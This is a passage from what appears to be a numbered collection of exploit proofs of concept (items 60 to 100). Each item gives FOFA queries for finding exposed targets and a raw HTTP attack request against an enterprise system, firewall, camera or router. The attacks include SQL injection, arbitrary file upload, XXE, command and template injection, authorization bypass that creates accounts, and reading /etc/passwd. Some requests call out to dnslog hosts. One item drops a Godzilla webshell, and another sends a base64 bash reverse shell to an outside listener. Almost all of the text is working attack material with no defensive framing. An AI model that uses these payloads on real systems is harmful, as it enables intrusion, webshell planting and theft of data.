User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then request the uploaded file:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace PAYLOAD in the PoC above with the generated value:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
